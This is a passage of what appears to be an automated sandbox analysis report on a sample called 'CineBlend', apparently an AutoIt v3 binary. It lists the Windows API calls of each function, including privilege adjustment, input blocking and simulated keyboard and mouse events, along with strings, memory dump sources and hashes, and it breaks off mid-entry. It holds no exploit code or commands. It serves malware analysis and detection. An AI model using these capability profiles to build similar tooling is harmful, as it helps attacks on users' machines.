                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 336ea0ea3955218fa6538c4d8919edd2c45687df4934cf30c7045a5bb82a6988
                                          • Instruction ID: 24001e9021c830b03dc0276ff1cccd3d1a3767dbc9355e4fc8331f0ed0028579
                                          • Opcode Fuzzy Hash: 336ea0ea3955218fa6538c4d8919edd2c45687df4934cf30c7045a5bb82a6988
                                          • Instruction Fuzzy Hash: 44F0907180424DABDB019FA4C815BFEBFB0FF04319F00804AF961A6192D779C611DF94
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA1B48), ref: 00BA1A20
                                          • CloseHandle.KERNEL32(?,?,00BA1B48), ref: 00BA1A35
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 6dd5953be5888f3206586d13e7320a36d47964119daca0129d7a0b7e8c07fb6c
                                          • Instruction ID: 6131046e7c803770f1193c6d8e6703a43835f40299d4cce649cd001a0b6622f5
                                          • Opcode Fuzzy Hash: 6dd5953be5888f3206586d13e7320a36d47964119daca0129d7a0b7e8c07fb6c
                                          • Instruction Fuzzy Hash: FBE04F72019610AFE7252B11FC05F73B7EDEB05320F14885EF4A681470EB726C90DB14
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 00BBF51A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 20e1d6482613e183349086fd5a388138ed4e6c0af25b0ed299e2ef4100bbd403
                                          • Instruction ID: 4239cca86c23e8e0828cca2fa799fda63622e662a59d250dd87d1586012bec9c
                                          • Opcode Fuzzy Hash: 20e1d6482613e183349086fd5a388138ed4e6c0af25b0ed299e2ef4100bbd403
                                          • Instruction Fuzzy Hash: 77E048312102055FC7109F69D8549A6F7D8EFA4761F048466F849C7351DAB0FA408BA0
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00BAECC7
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: 78f7d4cbaa315e8aee16f8670ac7b2f91513b33dec036d4168e226e40a2546a8
                                          • Instruction ID: d803c597d203544b2e349d6f3f2019d6576be06d3e35aee1aaf50c132b54a95e
                                          • Opcode Fuzzy Hash: 78f7d4cbaa315e8aee16f8670ac7b2f91513b33dec036d4168e226e40a2546a8
                                          • Instruction Fuzzy Hash: 44D05EB619C20038E81D1B389E6FB762689E703761F8806CAB222C96D8F5D5E980A025
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B6075E), ref: 00B60D4A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 25d7a3cdeaee8fc4a0e5d3c03e596184edd02dfde2eb8aa10a36a3a6024eb5dc
                                          • Instruction ID: 735093d440fe01af9d09012c9f54ee2ff413fc02e453f7acc385cbb8a78dbcf4
                                          • Opcode Fuzzy Hash: 25d7a3cdeaee8fc4a0e5d3c03e596184edd02dfde2eb8aa10a36a3a6024eb5dc
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00BC358D
                                          • DeleteObject.GDI32(00000000), ref: 00BC35A0
                                          • DestroyWindow.USER32 ref: 00BC35AF
                                          • GetDesktopWindow.USER32 ref: 00BC35CA
                                          • GetWindowRect.USER32(00000000), ref: 00BC35D1
                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BC3700
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BC370E
                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3755
                                          • GetClientRect.USER32(00000000,?), ref: 00BC3761
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC379D
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37BF
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37D2
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37DD
                                          • GlobalLock.KERNEL32(00000000), ref: 00BC37E6
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC37F5
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BC37FE
                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3805
                                          • GlobalFree.KERNEL32(00000000), ref: 00BC3810
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3822
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE0C04,00000000), ref: 00BC3838
                                          • GlobalFree.KERNEL32(00000000), ref: 00BC3848
                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BC386E
                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BC388D
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC38AF
                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC3A9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: d7a663cb51ae1eb35e0a6de22ec3ee1465c4162f521956b3ad28aa9b45861d35
                                          • Instruction ID: b7f9302a042d82ae77d3ab8a0a715d2cbce03db015e91b2d84049d7bdba4b9f5
                                          • Opcode Fuzzy Hash: d7a663cb51ae1eb35e0a6de22ec3ee1465c4162f521956b3ad28aa9b45861d35
                                          • Instruction Fuzzy Hash: 2F026C71900205AFDB14DF64CC99FAEBBF9EB49710F048199F955AB2A0DB74EE01CB60
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00BD7B67
                                          • GetSysColorBrush.USER32(0000000F), ref: 00BD7B98
                                          • GetSysColor.USER32(0000000F), ref: 00BD7BA4
                                          • SetBkColor.GDI32(?,000000FF), ref: 00BD7BBE
                                          • SelectObject.GDI32(?,?), ref: 00BD7BCD
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00BD7BF8
                                          • GetSysColor.USER32(00000010), ref: 00BD7C00
                                          • CreateSolidBrush.GDI32(00000000), ref: 00BD7C07
                                          • FrameRect.USER32(?,?,00000000), ref: 00BD7C16
                                          • DeleteObject.GDI32(00000000), ref: 00BD7C1D
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00BD7C68
                                          • FillRect.USER32(?,?,?), ref: 00BD7C9A
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD7CBC
                                            • Part of subcall function 00BD7E22: GetSysColor.USER32(00000012), ref: 00BD7E5B
                                            • Part of subcall function 00BD7E22: SetTextColor.GDI32(?,00BD7B2D), ref: 00BD7E5F
                                            • Part of subcall function 00BD7E22: GetSysColorBrush.USER32(0000000F), ref: 00BD7E75
                                            • Part of subcall function 00BD7E22: GetSysColor.USER32(0000000F), ref: 00BD7E80
                                            • Part of subcall function 00BD7E22: GetSysColor.USER32(00000011), ref: 00BD7E9D
                                            • Part of subcall function 00BD7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BD7EAB
                                            • Part of subcall function 00BD7E22: SelectObject.GDI32(?,00000000), ref: 00BD7EBC
                                            • Part of subcall function 00BD7E22: SetBkColor.GDI32(?,?), ref: 00BD7EC5
                                            • Part of subcall function 00BD7E22: SelectObject.GDI32(?,?), ref: 00BD7ED2
                                            • Part of subcall function 00BD7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00BD7EF1
                                            • Part of subcall function 00BD7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BD7F08
                                            • Part of subcall function 00BD7E22: GetWindowLongW.USER32(?,000000F0), ref: 00BD7F15
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: aade66d2ba50d75a26cf0962c6df615dcface17fb58b82677208caa375aa50bb
                                          • Instruction ID: 1bebfffde1437b269b25fa9cce5eda2248c93377b9f436bb396e8eb2d963520f
                                          • Opcode Fuzzy Hash: aade66d2ba50d75a26cf0962c6df615dcface17fb58b82677208caa375aa50bb
                                          • Instruction Fuzzy Hash: 21A17D71049301AFC7119F64DC58AABFBE9FB48324F140A5AF9A2A71A0FB71D944CB91
                                          APIs
                                          • DestroyWindow.USER32(?,?), ref: 00B416B4
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B82B07
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B82B40
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B82F85
                                            • Part of subcall function 00B41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B41488,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B41865
                                          • SendMessageW.USER32(?,00001053), ref: 00B82FC1
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B82FD8
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B82FEE
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B82FF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 2760611726-4108050209
                                          • Opcode ID: d3b29f7bd93694cc97c655d6ad7224386bc02b8d816f3aab53861bf6eea8a476
                                          • Instruction ID: 37985823f6e71043565af1343ec328869b0e2aa343760ee9b7e74269e541089d
                                          • Opcode Fuzzy Hash: d3b29f7bd93694cc97c655d6ad7224386bc02b8d816f3aab53861bf6eea8a476
                                          • Instruction Fuzzy Hash: 7512CC34601211EFDB25EF18C894BA9BBE5FB45300F1885AAF4859B271CB31ED92DF91
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00BC319B
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC32C7
                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00BC3306
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BC3316
                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BC335D
                                          • GetClientRect.USER32(00000000,?), ref: 00BC3369
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00BC33B2
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC33C1
                                          • GetStockObject.GDI32(00000011), ref: 00BC33D1
                                          • SelectObject.GDI32(00000000,00000000), ref: 00BC33D5
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BC33E5
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC33EE
                                          • DeleteDC.GDI32(00000000), ref: 00BC33F7
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC3423
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC343A
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00BC347A
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC348E
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC349F
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00BC34D4
                                          • GetStockObject.GDI32(00000011), ref: 00BC34DF
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC34EA
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BC34F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: fe8b2ac954f50089f5c8f82c19b502f3bdd783ceb6aed3d7e1d3346a672ae42e
                                          • Instruction ID: ce2bb4e6d4ac40f81a369804b0f6f0bf7bcc0f9aa5c907ad5ec59104ebf0d333
                                          • Opcode Fuzzy Hash: fe8b2ac954f50089f5c8f82c19b502f3bdd783ceb6aed3d7e1d3346a672ae42e
                                          • Instruction Fuzzy Hash: FDB15E75A40215AFDB14DFA8CC45FAEBBF9EB08710F408159F955EB2A0DB74AE00CB94
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00BB5532
                                          • GetDriveTypeW.KERNEL32(?,00BDDC30,?,\\.\,00BDDCD0), ref: 00BB560F
                                          • SetErrorMode.KERNEL32(00000000,00BDDC30,?,\\.\,00BDDCD0), ref: 00BB577B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: fea1839beba7a73d050ec7425eaca0a2c32afa5e4747bf4a8b371996e57920a4
                                          • Instruction ID: 303ceb0064f786ce8ad98b01ee12fed7eb742ba5f4a39af9356c370011441b4c
                                          • Opcode Fuzzy Hash: fea1839beba7a73d050ec7425eaca0a2c32afa5e4747bf4a8b371996e57920a4
                                          • Instruction Fuzzy Hash: 7F619230B48A05DBCB38DF25C991AF977E1EF14350B2481E6E406AB291DAB1ED43DB53
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00BD1BC4
                                          • GetDesktopWindow.USER32 ref: 00BD1BD9
                                          • GetWindowRect.USER32(00000000), ref: 00BD1BE0
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD1C35
                                          • DestroyWindow.USER32(?), ref: 00BD1C55
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD1C89
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD1CA7
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BD1CB9
                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00BD1CCE
                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00BD1CE1
                                          • IsWindowVisible.USER32(00000000), ref: 00BD1D3D
                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00BD1D58
                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00BD1D6C
                                          • GetWindowRect.USER32(00000000,?), ref: 00BD1D84
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00BD1DAA
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00BD1DC4
                                          • CopyRect.USER32(?,?), ref: 00BD1DDB
                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00BD1E46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: fe3ba9450399fe9e8c15e800c16273feb8ed8ba7546eb266411f1bf4e6b0b9c3
                                          • Instruction ID: 6b7d11f483fff6491b4e24a756713272d8395509de83427328c8941cd14f9b5e
                                          • Opcode Fuzzy Hash: fe3ba9450399fe9e8c15e800c16273feb8ed8ba7546eb266411f1bf4e6b0b9c3
                                          • Instruction Fuzzy Hash: 6BB18071605301AFD714DF68C884B5AFBE5FF84310F04899EF9999B291EB31D844CB91
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00BD0D81
                                          • _wcslen.LIBCMT ref: 00BD0DBB
                                          • _wcslen.LIBCMT ref: 00BD0E25
                                          • _wcslen.LIBCMT ref: 00BD0E8D
                                          • _wcslen.LIBCMT ref: 00BD0F11
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BD0F61
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BD0FA0
                                            • Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D
                                            • Part of subcall function 00BA2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA2BA5
                                            • Part of subcall function 00BA2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA2BD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 1103490817-719923060
                                          • Opcode ID: d9257868ebc01f9d2317f232dbd06fcebd5305f8a8f4425d3a22718b5dca9171
                                          • Instruction ID: 4a06c416ad45718b953efbd5af94b0e61cc8c7da7d80a6c082465929600f02f7
                                          • Opcode Fuzzy Hash: d9257868ebc01f9d2317f232dbd06fcebd5305f8a8f4425d3a22718b5dca9171
                                          • Instruction Fuzzy Hash: 2CE1C0312182419FCB14EF28C59096AF7E6FF84314F1489AEF896973A1EB30ED45CB51
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B425F8
                                          • GetSystemMetrics.USER32(00000007), ref: 00B42600
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B4262B
                                          • GetSystemMetrics.USER32(00000008), ref: 00B42633
                                          • GetSystemMetrics.USER32(00000004), ref: 00B42658
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B42675
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B42685
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B426B8
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B426CC
                                          • GetClientRect.USER32(00000000,000000FF), ref: 00B426EA
                                          • GetStockObject.GDI32(00000011), ref: 00B42706
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B42711
                                            • Part of subcall function 00B419CD: GetCursorPos.USER32(?), ref: 00B419E1
                                            • Part of subcall function 00B419CD: ScreenToClient.USER32(00000000,?), ref: 00B419FE
                                            • Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000001), ref: 00B41A23
                                            • Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000002), ref: 00B41A3D
                                          • SetTimer.USER32(00000000,00000000,00000028,00B4199C), ref: 00B42738
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
